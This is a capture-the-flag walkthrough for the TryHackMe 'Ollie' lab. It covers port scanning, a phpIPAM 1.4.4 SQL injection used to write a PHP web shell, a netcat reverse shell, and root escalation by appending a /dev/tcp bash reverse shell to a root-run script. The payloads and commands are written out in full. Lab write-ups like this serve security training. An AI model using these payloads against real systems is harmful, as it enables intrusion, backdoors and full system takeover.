Today we will take a look at TryHackMe: Ollie. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.
Command: sudo nmap -sT -p- -T5 -vv -oN nmap/all_ports 10.10.86.146
1337 port Enumeration
Command: nc IP 1337
Yes, this is a simple chat correspondence. In the end, we get the necessary credential
I tried to log in to Ollie with SSH, but it didn’t work.
Let’s take a look at the website now.
It is a simple login page. Let’s enter with the credential we have.
I did research on phpIPAM. And it turned out that version 1.4.4 has a vulnerability to sql injection.
Let’s check here
Go to the Routing section
Go to the example in the Peer Name section. Click the Actions button and select Subnet mapping
Now let’s check the vulnerability.
phpIPAM 1.4.4 - SQL Injection | Fluid Attacks
phpIPAM v1.4.4 allows an authenticated admin user to inject SQL sentences in the "subnet" parameter while searching a…
Command: “union select @@version,2,user(),4 — -
It works. Now let’s create rce
SQLI to RCE - Kayran
Preform sql injection attacks against your database, then convert them into Remote Code execution. Learn how common web…
Command: “ union select null,null,null,”<?php system($_GET[‘cmd’]); ?>” into outfile “/var/www/html/backdoor.php” — -
Reverse shell weed. But keep in mind that you need to encode the url as you type in the url section.
Command: rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP 4242 >/tmp/f
URL Encode and Decode - Online
Encode to URL-encoded format (also known as "percent-encoded") or decode from it with various advanced options. Our…
As soon as I received the reverse shell, I changed the user using the previous data.
Command: find / -group ollie 2>/dev/null
There are some interesting results. But this was the most interesting.
After checking it, I saw that it works as root, and I used it to enter the reverse shell command.
Command: echo ‘bash -i >& /dev/tcp/IP/4444 0>&1’ >> /usr/bin/feedme
And now we are the root
“If you have any questions or comments, please do not hesitate to write. Have a good days”